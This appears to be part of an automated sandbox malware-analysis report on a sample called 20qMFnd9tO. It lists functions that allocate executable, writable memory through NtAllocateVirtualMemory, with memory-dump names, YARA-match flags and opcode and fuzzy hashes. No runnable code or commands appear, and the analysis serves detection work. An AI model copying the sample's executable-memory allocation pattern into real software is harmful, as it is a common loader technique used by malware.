                                              • Opcode ID: 8077b765d2f01fafac2b4f14513b8ec513e0ce0fb36ae7632bc643084f448ab9
                                              • Instruction ID: 8e449749742e58b5b1f1b1dd327829eb5986892717dbfd98767e4fdb3ec6057f
                                              • Opcode Fuzzy Hash: 8077b765d2f01fafac2b4f14513b8ec513e0ce0fb36ae7632bc643084f448ab9
                                              • Instruction Fuzzy Hash: 24311A76210B549FD724CF28C854BA7B3E5FB46304F544A2DD5EB87690D770B408CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00701AF7 Relevance: 3.1, APIs: 2, Instructions: 88nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00701BAB
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00701BEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: c503b2931ba4be19bf3b837eae31675387b254d781678708b3064e9579df13e0
                                              • Instruction ID: 6838feff1f1d61195f2550219452db994d845ed650e69b9f135e32e094e950ce
                                              • Opcode Fuzzy Hash: c503b2931ba4be19bf3b837eae31675387b254d781678708b3064e9579df13e0
                                              • Instruction Fuzzy Hash: 21312AB5250B40CFD764CF24C884B56B7E5FB49304F504A2CDAAA87BA1DB74B809CB58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F8D98 Relevance: 3.1, APIs: 2, Instructions: 88nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F8E40
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006F8E83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 09b22ea7f253ff7041674a3059a74694970cb7c69b7ba788141bcdceb95a7e67
                                              • Instruction ID: 4873e4c3da9ea01fcf524946efaab7cbaa13740d54d77308ab18f0eda46c6ae4
                                              • Opcode Fuzzy Hash: 09b22ea7f253ff7041674a3059a74694970cb7c69b7ba788141bcdceb95a7e67
                                              • Instruction Fuzzy Hash: 99314875A106199FEB04CF98C845BEEBBB4FB09318F144528E521FB3D0DB749909CBA9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00421890 Relevance: 3.1, APIs: 2, Instructions: 88nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00421944
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00421988
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: c503b2931ba4be19bf3b837eae31675387b254d781678708b3064e9579df13e0
                                              • Instruction ID: 49bbfd4f0de6845258362e3d3de246316e0c3f4bf52f89520e3f34382b852488
                                              • Opcode Fuzzy Hash: c503b2931ba4be19bf3b837eae31675387b254d781678708b3064e9579df13e0
                                              • Instruction Fuzzy Hash: 81312B75250F008FD768CF24C884B5777E5FB49304F504A2DDAAA87BA1DB74B809CB58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418B31 Relevance: 3.1, APIs: 2, Instructions: 88nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00418BD9
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00418C1C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 09b22ea7f253ff7041674a3059a74694970cb7c69b7ba788141bcdceb95a7e67
                                              • Instruction ID: a0b949505e1f258bbdb30e43a8dba9a1ee21f652754862f287b7761fcf2c5478
                                              • Opcode Fuzzy Hash: 09b22ea7f253ff7041674a3059a74694970cb7c69b7ba788141bcdceb95a7e67
                                              • Instruction Fuzzy Hash: 97318CB5A106199FEB04CF58C845BEEB7B4FB09318F140528E521FB3D0D774A905CBA8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DBF0 Relevance: 3.1, APIs: 2, Instructions: 88nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041DCB7
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 0041DD0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: f97fd3ada14f2cc6b3f81b5ee582d3332143fe512b8af8433ca6cc5d4f349def
                                              • Instruction ID: 4a9c1518cde3a82dfe521eefc06fea6893533b4f693cdbd280119405f97b0980
                                              • Opcode Fuzzy Hash: f97fd3ada14f2cc6b3f81b5ee582d3332143fe512b8af8433ca6cc5d4f349def
                                              • Instruction Fuzzy Hash: 643148B6210B109FE724CF28C894B9773E4FB4A308F544A2DD5EB87690D774A848CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007186D7 Relevance: 3.1, APIs: 2, Instructions: 87nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00718786
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 007187DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
                                              • Instruction ID: b22ddaacb260edc6b1729d723f7c0f22d85a7e7144d9104012f3f37230bd9f7d
                                              • Opcode Fuzzy Hash: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
                                              • Instruction Fuzzy Hash: E8319A75108304AFD710CF08DC40B5FBBE9EB85368F118A28F9A49B2E0D77698498B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007106B7 Relevance: 3.1, APIs: 2, Instructions: 87nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00710766
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 007107BE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4e2c89e4e48fc43445bc0bfc2be4be2921fc80f27ae34843d61b2bf3adc76f08
                                              • Instruction ID: 6105fb3685fabf09ecdd8f7e9d861aaae2f70962d418866c1fe32d0f9ac06bbd
                                              • Opcode Fuzzy Hash: 4e2c89e4e48fc43445bc0bfc2be4be2921fc80f27ae34843d61b2bf3adc76f08
                                              • Instruction Fuzzy Hash: 312191752083019FD700CF18C840B5FBBE5EB85364F118A28F9A49B3D0D7B59849CBD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00430450 Relevance: 3.1, APIs: 2, Instructions: 87nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004304FF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00430557
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4e2c89e4e48fc43445bc0bfc2be4be2921fc80f27ae34843d61b2bf3adc76f08
                                              • Instruction ID: 29972af5fe94d7b8a40e143ce72aa4096c978aec6186483cf45ea1895d383db7
                                              • Opcode Fuzzy Hash: 4e2c89e4e48fc43445bc0bfc2be4be2921fc80f27ae34843d61b2bf3adc76f08
                                              • Instruction Fuzzy Hash: D121A271208300AFD710CF18C840B1FBBE5EB89368F118A29F9A89B390D7719C098B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FA62C Relevance: 3.1, APIs: 2, Instructions: 86nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FA910
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FA96F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 79bc227e08a2f5ff7d9fe338edb3f352c070aed30302adcf6e4905450b311dd4
                                              • Instruction ID: 2330e2167bd0c5105f6e5331bade56896e844757ee1b2b4d4eb23022af8077f2
                                              • Opcode Fuzzy Hash: 79bc227e08a2f5ff7d9fe338edb3f352c070aed30302adcf6e4905450b311dd4
                                              • Instruction Fuzzy Hash: 09318EB51097949FE730CF14CC54B9AB7E4FB85318F108B2CE6A89B2D0D7709809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041DA90 Relevance: 3.1, APIs: 2, Instructions: 86nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041DB2E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 0041DB7D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: e37131d5da6044e214aa9c5616a093205d14bc2d1d964633dc5122c7baad7a5d
                                              • Instruction ID: 09b93d9020438aea7cd1e242f5b9a77637022a544cc1098ab101b0a030c62817
                                              • Opcode Fuzzy Hash: e37131d5da6044e214aa9c5616a093205d14bc2d1d964633dc5122c7baad7a5d
                                              • Instruction Fuzzy Hash: 853102B6210B108FD724CF24C880B56B7F5FB48318F448A2CDAAA87B90D775B808CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F5D7C Relevance: 3.1, APIs: 2, Instructions: 84nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000040), ref: 006F5E58
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 006F5EAB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
                                              • Instruction ID: 83d50ae1037407bafbc8e6d09823e23c42263376586840b874a8a95d8b0cec44
                                              • Opcode Fuzzy Hash: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
                                              • Instruction Fuzzy Hash: 4F319CB51097408FD714CF14C885B6AB7E5FB89308F104A2CF6AAD73A1DB349909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F709D Relevance: 3.1, APIs: 2, Instructions: 83nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 006F6F46
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 006F6F90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4cf9a12a1c1596703c9260c20ceaa8556c140519b539f2e1e2e4fc70cbacc831
                                              • Instruction ID: d9e3b6369e3695508e522ab43cb48c63826d9755dfe5d8d6f84e27c0d473912e
                                              • Opcode Fuzzy Hash: 4cf9a12a1c1596703c9260c20ceaa8556c140519b539f2e1e2e4fc70cbacc831
                                              • Instruction Fuzzy Hash: 773149B5209B048FE714CF14C844B6EB7E6FB89308F544A2CF6A59B3A1D774D908CB5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00416E36 Relevance: 3.1, APIs: 2, Instructions: 83nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416CDF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00416D29
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4cf9a12a1c1596703c9260c20ceaa8556c140519b539f2e1e2e4fc70cbacc831
                                              • Instruction ID: 94750a51c5a281ab075b6fb44a327f94b4a5991b49b2ef486b4691c57b39bb18
                                              • Opcode Fuzzy Hash: 4cf9a12a1c1596703c9260c20ceaa8556c140519b539f2e1e2e4fc70cbacc831
                                              • Instruction Fuzzy Hash: 39318DB9208B008FE714CF14C844BAEB7E5FB89308F154A2DF5A5873A1D778D848CB5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00712CB7 Relevance: 3.1, APIs: 2, Instructions: 81nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712D5C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00712DA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: c5c35e0244ac606f51718ee16942e59aad859cd88aaa0243b3064a8156a3f719
                                              • Instruction ID: 648a2c39e4c6ca7d011f2ae976f8841cce01f9f13a1aa31c23567419c42e46e7
                                              • Opcode Fuzzy Hash: c5c35e0244ac606f51718ee16942e59aad859cd88aaa0243b3064a8156a3f719
                                              • Instruction Fuzzy Hash: D8217CB52087059FE714CF04D844B5FBBE8EB85718F10892CF9A98B3D1D7B598488B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432A50 Relevance: 3.1, APIs: 2, Instructions: 81nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00432AF5
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00432B3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: c5c35e0244ac606f51718ee16942e59aad859cd88aaa0243b3064a8156a3f719
                                              • Instruction ID: 2ee1043d88a285645d7f97a0da1e18341c84435fe3925ceb9260c2353b51d83b
                                              • Opcode Fuzzy Hash: c5c35e0244ac606f51718ee16942e59aad859cd88aaa0243b3064a8156a3f719
                                              • Instruction Fuzzy Hash: 9A218EB51087059FE714CF05C884B1BBBE8EB85718F10892DF9A98B390D7B59808CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F7A47 Relevance: 3.1, APIs: 2, Instructions: 79nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 006F7BEF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 006F7C38
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 38028a47181cc7f50f52e47984664b7f564658feb4dd0ce08231d321370748cd
                                              • Instruction ID: 493a9bd290817b15eca9c2f25878bd98a0a94dad6070ba278ccdc130d12bdd97
                                              • Opcode Fuzzy Hash: 38028a47181cc7f50f52e47984664b7f564658feb4dd0ce08231d321370748cd
                                              • Instruction Fuzzy Hash: 5A215AB51087448FE714CF14C844BAEB7E8FB89314F54892CF6A5C73A1DB74D9098B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00712EF7 Relevance: 3.1, APIs: 2, Instructions: 79nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712F9C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00712FF1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: b00825ab4c2e7448369cb11ed8d874c639a92428a2134424e2682ba947fd447f
                                              • Instruction ID: 8f41a66b852c094ef8430221cfb83e83bfeae91284aa8b1cc59fa4a21508b0af
                                              • Opcode Fuzzy Hash: b00825ab4c2e7448369cb11ed8d874c639a92428a2134424e2682ba947fd447f
                                              • Instruction Fuzzy Hash: 44218C76108314AFD710CF08C844B5FBBE8EB85758F008A2CFAA58B2D1D7759849CBA3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432C90 Relevance: 3.1, APIs: 2, Instructions: 79nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00432D35
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00432D8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: b00825ab4c2e7448369cb11ed8d874c639a92428a2134424e2682ba947fd447f
                                              • Instruction ID: 643f0781e92c5f8fc253c488f8d70b3ce2d9127fbd21d3ac1bba45378bd451dd
                                              • Opcode Fuzzy Hash: b00825ab4c2e7448369cb11ed8d874c639a92428a2134424e2682ba947fd447f
                                              • Instruction Fuzzy Hash: AA218F75108314AFD710CF04D944B1FBBE8EB89758F004A2DFAA58B390D7759808CBA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F5567 Relevance: 3.1, APIs: 2, Instructions: 77nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006F5608
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006F564C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
                                              • Instruction ID: 6e4052b64e95983afd25afe45b640b2b591003ad63442387322cc7c2fc5e07e6
                                              • Opcode Fuzzy Hash: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
                                              • Instruction Fuzzy Hash: DB215E751087149FD710CF18C844B5FBBE8EB85368F118A2CFAA98B391D7749C088B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FED2E Relevance: 3.1, APIs: 2, Instructions: 77nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FEDF2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FEE37
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: d651411851db1cdd31991ac762ed0165810fdde2d17c003d70a78e34f7724eb0
                                              • Instruction ID: ce208e41c4b138f43d20e8df30645732b9a6f918903f2db72b6575e66474a26a
                                              • Opcode Fuzzy Hash: d651411851db1cdd31991ac762ed0165810fdde2d17c003d70a78e34f7724eb0
                                              • Instruction Fuzzy Hash: 3D31E4B5110B04CFD725CF29C844B66BBE5FB49314F508A2CE6A68BBA0D775F809CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00714742 Relevance: 3.1, APIs: 2, Instructions: 76nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 007147EF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000010,00000010,00008000), ref: 0071483E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
                                              • Instruction ID: 2925f1664b0d8c314327cd8cea83233d771f9b43b6a06b3d1524ee32cc612b93
                                              • Opcode Fuzzy Hash: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
                                              • Instruction Fuzzy Hash: 342175B51083419FE710CF08C848B5BBBE4FB85718F148A2CF5A59B2D0C7B8990CCB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FEE57 Relevance: 3.1, APIs: 2, Instructions: 74nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FEF21
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FEF65
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9c12a67164894d1d9f12791c66d3fada26ffbb4cbdc7235806929504a5d3e0e2
                                              • Instruction ID: b8d4904b0adb197cd571f8d2270dd9bb63b27b3d404af405cbf5e9afe82e0125
                                              • Opcode Fuzzy Hash: 9c12a67164894d1d9f12791c66d3fada26ffbb4cbdc7235806929504a5d3e0e2
                                              • Instruction Fuzzy Hash: 522126B6110B148FD724CF28C844B26B7F5FB49704F508A2CE6AA8BBA0D775F804CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F130A Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: |~S$-+
                                              • API String ID: 0-3866320884
                                              • Opcode ID: 59b65dd590fb0ee88e50e23c03c0ad093372e6083e92c6d488c3e8e64a7c0231
